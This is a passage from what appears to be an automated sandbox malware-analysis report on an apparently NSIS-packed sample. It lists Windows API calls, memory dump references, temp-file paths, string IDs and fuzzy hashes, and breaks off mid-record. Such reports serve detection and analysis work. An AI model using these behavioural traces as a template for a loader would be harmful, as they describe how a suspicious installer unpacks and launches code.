                                                                                                      • Instruction Fuzzy Hash: D631BC31908601DFDB259FA8D994C2A7BBAFBB7314310466AF541C72E0C731E869CF65
                                                                                                      APIs
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                      • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2667972263-0
                                                                                                      • Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                      • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                      • Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                      • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                      • wsprintfW.USER32 ref: 00404CB6
                                                                                                      • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                      • String ID: %u.%u%s%s$(7B
                                                                                                      • API String ID: 3540041739-1320723960
                                                                                                      • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                      • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                      • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                      • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                      APIs
                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsoC476.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsoC476.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsoC476.tmp$C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll
                                                                                                      • API String ID: 3109718747-2427345754
                                                                                                      • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                      • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                                                                      • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                      • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2212754583.000000006F941000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F940000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2212735857.000000006F940000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2212770534.000000006F944000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2212826501.000000006F946000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6f940000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeGlobal
                                                                                                      • String ID:
                                                                                                      • API String ID: 2979337801-0
                                                                                                      • Opcode ID: a66b57fb0fc237b61d2e4119f7234950d60020a7cf2c74dcac3ed0a74b23f0b2
                                                                                                      • Instruction ID: c5b245ad83e05b22e9c2ceb093cf071141a5848933e905557cc4c9b3331a6292
                                                                                                      • Opcode Fuzzy Hash: a66b57fb0fc237b61d2e4119f7234950d60020a7cf2c74dcac3ed0a74b23f0b2
                                                                                                      • Instruction Fuzzy Hash: AD51C232D041599ACBA39FB886405AEB7B9AF77318B00425BD614E72C1D770FEE187B1
                                                                                                      APIs
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F9424D6
                                                                                                        • Part of subcall function 6F94122C: lstrcpynW.KERNEL32(00000000,?,6F9412DF,00000019,6F9411BE,-000000A0), ref: 6F94123C
                                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 6F94245C
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F942477
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2212754583.000000006F941000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F940000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2212735857.000000006F940000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2212770534.000000006F944000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2212826501.000000006F946000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6f940000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                      • String ID:
                                                                                                      • API String ID: 4216380887-0
                                                                                                      • Opcode ID: 3f5749efbad4a5aba9694c089d58048815ad1023029b6930d7dd34bbaab1a9cf
                                                                                                      • Instruction ID: f74d77f5f87ca4259384ebe8f8d71f41c9fc2ef531e2ac36828231750faf09b9
                                                                                                      • Opcode Fuzzy Hash: 3f5749efbad4a5aba9694c089d58048815ad1023029b6930d7dd34bbaab1a9cf
                                                                                                      • Instruction Fuzzy Hash: AF41BDB0008705DFD724EF68D844A6677B8FBBA724B004A5EE546C75C2EB70E498CF61
                                                                                                      APIs
                                                                                                      • GetDC.USER32(?), ref: 00401DBC
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                      • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 3808545654-0
                                                                                                      • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                      • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                      • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                      • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                      APIs
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F9421EC,?,00000808), ref: 6F941635
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F9421EC,?,00000808), ref: 6F94163C
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F9421EC,?,00000808), ref: 6F941650
                                                                                                      • GetProcAddress.KERNEL32(6F9421EC,00000000), ref: 6F941657
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F941660
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2212754583.000000006F941000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F940000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2212735857.000000006F940000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2212770534.000000006F944000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2212826501.000000006F946000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6f940000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1148316912-0
                                                                                                      • Opcode ID: ae35bb319aaa23c5b82d16b788c59a6cf840cb843f0f3bd76c175cdedf13a9ad
                                                                                                      • Instruction ID: 1acaffe15705b26657ab3e27be878011c254a3d177374d5158f2df1613b783bb
                                                                                                      • Opcode Fuzzy Hash: ae35bb319aaa23c5b82d16b788c59a6cf840cb843f0f3bd76c175cdedf13a9ad
                                                                                                      • Instruction Fuzzy Hash: B4F0127210A5387BDB202AAA8C4CC9B7F9CEF9B2F5B110211F6189119085624C25DFF1
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 1849352358-0
                                                                                                      • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                      • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                      • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                      • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                      APIs
                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Timeout
                                                                                                      • String ID: !
                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                      • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                      • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                      • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                      • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF
                                                                                                      Strings
                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                      • API String ID: 2659869361-823278215
                                                                                                      • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                      • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                                      • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                      • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                                      APIs
                                                                                                      • GlobalFree.KERNEL32(007321E8), ref: 00401BE7
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401BF9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocFree
                                                                                                      • String ID: Call$!s
                                                                                                      • API String ID: 3394109436-3991978899
                                                                                                      • Opcode ID: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                      • Instruction ID: 4b9c6e54fa6809cb214bd66434af352d7e41d31d349781cb692caa9f676c35e6
                                                                                                      • Opcode Fuzzy Hash: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                      • Instruction Fuzzy Hash: 6E217B73A00200D7DB20EB94CEC995E73A4AB45314765053BF506F32D1DBB8E851DBAD
                                                                                                      APIs
                                                                                                        • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405D76
                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                      • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405E1E
                                                                                                      • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00405E2E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                      • String ID: 0_B
                                                                                                      • API String ID: 3248276644-2128305573
                                                                                                      • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                      • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                      • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                      • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                      APIs
                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                      Strings
                                                                                                      • Error launching installer, xrefs: 004059E4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                      • String ID: Error launching installer
                                                                                                      • API String ID: 3712363035-66219284
                                                                                                      • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                      • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                      • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                      • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75922EE0,00403A1A,75923420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                                                                      • GlobalFree.KERNEL32(?), ref: 00403A64
                                                                                                      Strings
                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                      • API String ID: 1100898210-823278215
                                                                                                      • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
